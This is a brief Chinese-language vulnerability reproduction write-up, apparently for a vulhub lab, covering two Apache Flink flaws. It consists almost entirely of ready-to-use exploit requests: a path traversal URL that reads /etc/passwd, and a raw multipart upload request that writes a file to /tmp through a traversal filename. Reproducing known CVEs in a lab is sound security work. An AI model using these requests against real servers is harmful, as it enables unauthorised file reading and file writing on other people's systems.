Apache Flink CVE-2020-17519/CVE-2020-17518 漏洞复现
CVE-2020-17519 任意文件读取
https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17519
访问8081 端口
http://your-ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
CVE-2020-17518
POST /jars/upload HTTP/1.1 Host: 192.168.1.79:8081 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Connection: close Content-Type: multipart/form-data; boundary=--------721072898 Content-Length: 150 ----------721072898 Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../../tmp/11.txt" success ----------721072898--
检测是否上传成功
http://192.168.1.79:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252f11.txt